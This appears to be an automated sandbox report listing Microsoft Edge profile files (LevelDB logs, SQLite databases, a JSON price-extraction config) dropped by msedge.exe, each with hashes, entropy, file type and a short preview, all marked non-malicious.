                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0996121297314145
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6un9+q2P923oH+Tcwt9Eh1tIFUtQuRJZmwuuk9VkwO923oH+Tcwt9Eh15LJ:76un9+v4Yeb9Eh16FUtQuRJ/uuk9V5Lw
                                                                                                                                                                                                                                                                                                                          MD5:BD52E4412765FAFA214D87F8B4205842
                                                                                                                                                                                                                                                                                                                          SHA1:93552BC8DFEF641D704A7C7D75DD549B0AE80AB5
                                                                                                                                                                                                                                                                                                                          SHA-256:9543DDBE696626DC0AA0FFCA9E77E66F4D0923A82688A741421B3A7527627DE2
                                                                                                                                                                                                                                                                                                                          SHA-512:E92E635ADD022822FFC97C863C24E8DAC3FE0BCC2F51FE8740BD43F8E51033914D0AC40B246A23EE34579186B70C846A5CA10682EFB8F37A8D25502B197E1A14
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:10.056 194c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/12-11:23:10.058 194c Recovering log #3.2025/01/12-11:23:10.062 194c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.46210309969149516
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuro:TouQq3qh7z3bY2LNW9WMcUvBuro
                                                                                                                                                                                                                                                                                                                          MD5:BDC4C6EEBBDC2EBBF37970382CE1E642
                                                                                                                                                                                                                                                                                                                          SHA1:951C69051ADF135C58872C7EAE209F6B0B41EB93
                                                                                                                                                                                                                                                                                                                          SHA-256:E328AC537F99BA750BAAF1C37AFAE2DC5B61262BE5F7F21C4918631790734706
                                                                                                                                                                                                                                                                                                                          SHA-512:A6ED90E2DFD010FF481BD4B3FC56052DE55D31848AE146B16C601E666BC337C4C81A655252E624947B799CC1882C162F5CC096A54C32B979220A69B1BDA39889
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                                          MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                                          SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                                          SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                                          SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):348
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.157500445156973
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u6+q2P923oH+TcwtnG2tMsIFUtQu+Zmwuu7VkwO923oH+TcwtnG2tMsLJ:76ubv4Yebn9GFUtQu+/uuh5LYebn95J
                                                                                                                                                                                                                                                                                                                          MD5:98B795BF7CCA09107A9B334C55CA9CD3
                                                                                                                                                                                                                                                                                                                          SHA1:F6F91988D10EBC5289586C53662AC25710DA9DF9
                                                                                                                                                                                                                                                                                                                          SHA-256:6B4064928A9C2A702AAB6A2DAAD053CE54EB4588E7188888021F0E09E0D9798D
                                                                                                                                                                                                                                                                                                                          SHA-512:CC3B596AB8FE7BD02C8BB3FB0E6B6BB4630F844FE673F4D362738C6B43ED261A6F171132BF94E5AD848AAC32671FEF0E68667D2436BA467AE5FB83CF1AC0829E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.333 1bc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/12-11:23:05.333 1bc8 Recovering log #3.2025/01/12-11:23:05.334 1bc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):348
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.157500445156973
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u6+q2P923oH+TcwtnG2tMsIFUtQu+Zmwuu7VkwO923oH+TcwtnG2tMsLJ:76ubv4Yebn9GFUtQu+/uuh5LYebn95J
                                                                                                                                                                                                                                                                                                                          MD5:98B795BF7CCA09107A9B334C55CA9CD3
                                                                                                                                                                                                                                                                                                                          SHA1:F6F91988D10EBC5289586C53662AC25710DA9DF9
                                                                                                                                                                                                                                                                                                                          SHA-256:6B4064928A9C2A702AAB6A2DAAD053CE54EB4588E7188888021F0E09E0D9798D
                                                                                                                                                                                                                                                                                                                          SHA-512:CC3B596AB8FE7BD02C8BB3FB0E6B6BB4630F844FE673F4D362738C6B43ED261A6F171132BF94E5AD848AAC32671FEF0E68667D2436BA467AE5FB83CF1AC0829E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.333 1bc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/12-11:23:05.333 1bc8 Recovering log #3.2025/01/12-11:23:05.334 1bc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6126060499006641
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jO0VJDpimL:TO8D4jJ/6Up+SWV
                                                                                                                                                                                                                                                                                                                          MD5:AFF678AED0129C917A27BB4F4A5B25D1
                                                                                                                                                                                                                                                                                                                          SHA1:F1BD5298C49DCF820F98D4C0F5C3E85217969F93
                                                                                                                                                                                                                                                                                                                          SHA-256:AE01A5178511E10A835ADB0FD103579E1CD8B429CDE6E68DC6E62858A09454BA
                                                                                                                                                                                                                                                                                                                          SHA-512:3EB0453AD686A32F09BB420253B649AB269BF121F66F9C8BA234ABAD76A3A30D988271C8BD078B79D09D9161D6B17A9A99AF4D9FD542FE53B4BD9A6987FB45B6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):375520
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.354138441688892
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:bA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:bFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                          MD5:4E9E9A6B793B27FCDE5440499688C90D
                                                                                                                                                                                                                                                                                                                          SHA1:B3F090F51FD31AF07C3F7AFB67A0AA8DCFECB2BE
                                                                                                                                                                                                                                                                                                                          SHA-256:E7EFC3CE6D0C8E668DBD6434F82F4AB9B520D3F5045DD14D38C31F81EF384E74
                                                                                                                                                                                                                                                                                                                          SHA-512:609D766A61680B0D14A443E81F389DF774121B2631DACF5B83F3D79B7E836F618A25033053554166193B004AE57ADBB891AD9E9C8D72BEAA0CEC0592753B81AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.M..q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13381172591600528..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):311
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.127352767191647
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uiUG81923oH+Tcwtk2WwnvB2KLlguPjN+q2P923oH+Tcwtk2WwnvIFUv:76u3GxYebkxwnvFLuu5+v4YebkxwnQF2
                                                                                                                                                                                                                                                                                                                          MD5:1745597870DE650C87D984911CC25F07
                                                                                                                                                                                                                                                                                                                          SHA1:4C451ABF83E0910B5A98C646C7481A41A7E2F219
                                                                                                                                                                                                                                                                                                                          SHA-256:C3215ABBF58E154B20200FCDAF5E020AD5647F781CFA5B358986B087BFD95085
                                                                                                                                                                                                                                                                                                                          SHA-512:1EF95C3C75829F1F936E3659BAD6D00647FEE01B8835EC5688B4C2AD00B4C440C7954E3A42AD838E1CEF379FACED6AF681DCA24FB45BF45DF12456CE555DD91C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:10.065 16cc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/12-11:23:10.098 16cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):358860
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324607873618632
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RC:C1gAg1zfv6
                                                                                                                                                                                                                                                                                                                          MD5:B8BD4CFE5BCEAD97C1DF4AF8F54BB7EF
                                                                                                                                                                                                                                                                                                                          SHA1:CE939AB231C62E2BAA418CCF36A9E578E1125775
                                                                                                                                                                                                                                                                                                                          SHA-256:3D566B539D83CEF215855958850DDC55068C98750987A9868DC26253E7EAE578
                                                                                                                                                                                                                                                                                                                          SHA-512:C0D7927E26C4F66B85A42D9C9FB0F61A11AA491EFF530C5CDAE2D5CAA41EF498413FDCB0A117586C4551F7C461B9F710D5508152C6FDBA5643FA09CFB813B7E5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0616676033368915
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6ur0Vq2P923oH+Tcwt8aPrqIFUtQuuGZmwuuu6kwO923oH+Tcwt8amLJ:76urWv4YebL3FUtQul/uu35LYebQJ
                                                                                                                                                                                                                                                                                                                          MD5:91213AD5C7689DD7842309E78B811A26
                                                                                                                                                                                                                                                                                                                          SHA1:67759177366DA96F9B6211D1CE4CC9C8F8788620
                                                                                                                                                                                                                                                                                                                          SHA-256:60B6B764E1E97D01CFAC6CFE7757CAFCEC709D550E1A6B87BCF76906603A6C11
                                                                                                                                                                                                                                                                                                                          SHA-512:E4BC06F95D2704D9C6A5C65400396DAD88469447AB37BFA4F7856A62340BB1B743DAF85887122DB04BDF7468BAA30046473356B48D8B3E311F0F836E40941853
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.209 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/12-11:23:05.210 1c90 Recovering log #3.2025/01/12-11:23:05.210 1c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0616676033368915
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6ur0Vq2P923oH+Tcwt8aPrqIFUtQuuGZmwuuu6kwO923oH+Tcwt8amLJ:76urWv4YebL3FUtQul/uu35LYebQJ
                                                                                                                                                                                                                                                                                                                          MD5:91213AD5C7689DD7842309E78B811A26
                                                                                                                                                                                                                                                                                                                          SHA1:67759177366DA96F9B6211D1CE4CC9C8F8788620
                                                                                                                                                                                                                                                                                                                          SHA-256:60B6B764E1E97D01CFAC6CFE7757CAFCEC709D550E1A6B87BCF76906603A6C11
                                                                                                                                                                                                                                                                                                                          SHA-512:E4BC06F95D2704D9C6A5C65400396DAD88469447AB37BFA4F7856A62340BB1B743DAF85887122DB04BDF7468BAA30046473356B48D8B3E311F0F836E40941853
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.209 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/12-11:23:05.210 1c90 Recovering log #3.2025/01/12-11:23:05.210 1c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
